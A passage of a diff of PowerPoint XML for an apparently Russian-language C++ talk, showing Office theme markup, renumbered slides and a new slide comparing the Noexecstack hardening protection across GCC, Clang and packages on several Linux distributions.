+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Times New Roman"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:majorFont>
+      <a:minorFont>
+        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游ゴシック"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Arial"/>
+        <a:font script="Hebr" typeface="Arial"/>
+        <a:font script="Thai" typeface="Cordia New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="DaunPenh"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Arial"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:minorFont>
+    </a:fontScheme>
+    <a:fmtScheme name="Office">
+      <a:fillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="110000"/>
+                <a:satMod val="105000"/>
+                <a:tint val="67000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="103000"/>
+                <a:tint val="73000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="109000"/>
+                <a:tint val="81000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:satMod val="103000"/>
+                <a:lumMod val="102000"/>
+                <a:tint val="94000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:satMod val="110000"/>
+                <a:lumMod val="100000"/>
+                <a:shade val="100000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="99000"/>
+                <a:satMod val="120000"/>
+                <a:shade val="78000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:fillStyleLst>
+      <a:lnStyleLst>
+        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+      </a:lnStyleLst>
+      <a:effectStyleLst>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst>
+            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+              <a:srgbClr val="000000">
+                <a:alpha val="63000"/>
+              </a:srgbClr>
+            </a:outerShdw>
+          </a:effectLst>
+        </a:effectStyle>
+      </a:effectStyleLst>
+      <a:bgFillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:solidFill>
+          <a:schemeClr val="phClr">
+            <a:tint val="95000"/>
+            <a:satMod val="170000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:tint val="93000"/>
+                <a:satMod val="150000"/>
+                <a:shade val="98000"/>
+                <a:lumMod val="102000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:tint val="98000"/>
+                <a:satMod val="130000"/>
+                <a:shade val="90000"/>
+                <a:lumMod val="103000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:shade val="63000"/>
+                <a:satMod val="120000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:bgFillStyleLst>
+    </a:fmtScheme>
+  </a:themeElements>
+  <a:objectDefaults/>
+  <a:extraClrSchemeLst/>
+  <a:extLst>
+    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
+    </a:ext>
+  </a:extLst>
+</a:theme>
 </file>
--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId92"/>
+    <p:notesMasterId r:id="rId95"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
@@ -89,15 +89,18 @@
     <p:sldId id="337" r:id="rId80"/>
     <p:sldId id="338" r:id="rId81"/>
     <p:sldId id="339" r:id="rId82"/>
-    <p:sldId id="343" r:id="rId83"/>
-    <p:sldId id="344" r:id="rId84"/>
-    <p:sldId id="330" r:id="rId85"/>
-    <p:sldId id="331" r:id="rId86"/>
-    <p:sldId id="345" r:id="rId87"/>
-    <p:sldId id="346" r:id="rId88"/>
-    <p:sldId id="270" r:id="rId89"/>
-    <p:sldId id="347" r:id="rId90"/>
-    <p:sldId id="271" r:id="rId91"/>
+    <p:sldId id="349" r:id="rId83"/>
+    <p:sldId id="350" r:id="rId84"/>
+    <p:sldId id="352" r:id="rId85"/>
+    <p:sldId id="343" r:id="rId86"/>
+    <p:sldId id="344" r:id="rId87"/>
+    <p:sldId id="330" r:id="rId88"/>
+    <p:sldId id="331" r:id="rId89"/>
+    <p:sldId id="345" r:id="rId90"/>
+    <p:sldId id="346" r:id="rId91"/>
+    <p:sldId id="270" r:id="rId92"/>
+    <p:sldId id="347" r:id="rId93"/>
+    <p:sldId id="271" r:id="rId94"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -27810,7 +27813,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4C022F-D41B-4B03-8A65-58F2114C9E48}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDAA1B05-6FFC-4C85-B5A3-DA4539C172D5}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -27828,7 +27831,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Безопасные языки</a:t>
+              <a:t>Использование в реальном коде</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -27839,7 +27842,7 @@
           <p:cNvPr id="3" name="Text Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6853D1FD-408A-472A-B24F-E4551AF7928C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79036A87-E2E4-4299-964C-FFE44BFB8C11}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -27864,7 +27867,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E712A9D-7C7A-4FC8-9DF7-07C7CED672C8}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B6C1F4-6EB7-4077-B9FC-3FB2FFABC475}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -27891,7 +27894,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3232067582"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3372442974"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -27936,6 +27939,3434 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
+            <a:off x="174812" y="-161132"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Дистрибутивы </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:graphicFrame>
+        <p:nvGraphicFramePr>
+          <p:cNvPr id="6" name="Table 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B100581C-268E-4180-9009-ACDCF3C31CEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGraphicFramePr>
+            <a:graphicFrameLocks noGrp="1"/>
+          </p:cNvGraphicFramePr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1770854364"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGraphicFramePr>
+        <p:xfrm>
+          <a:off x="838200" y="981311"/>
+          <a:ext cx="8453718" cy="5558160"/>
+        </p:xfrm>
+        <a:graphic>
+          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
+            <a:tbl>
+              <a:tblPr firstRow="1" bandRow="1">
+                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
+              </a:tblPr>
+              <a:tblGrid>
+                <a:gridCol w="1956531">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4226136556"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="625304">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1905133483"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="717177">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1978966490"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="815788">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3265969406"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="507101">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4013930117"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="685205">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1628476794"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="779929">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3566194404"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="690283">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="697534993"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="824753">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1231730987"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="851647">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2023815346"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+              </a:tblGrid>
+              <a:tr h="360000">
+                <a:tc rowSpan="2">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Защита</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc gridSpan="3">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Ubuntu 24.04</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc gridSpan="3">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Debian 12</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc gridSpan="3">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Fedora 42</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc hMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2621139126"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc vMerge="1">
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:endParaRPr lang="en-US" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>GCC</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Clang</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Пакеты</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>GCC</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Clang</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Пакеты</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>GCC</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Clang</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Пакеты</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1120226763"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+                        <a:t>Noexecstack</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
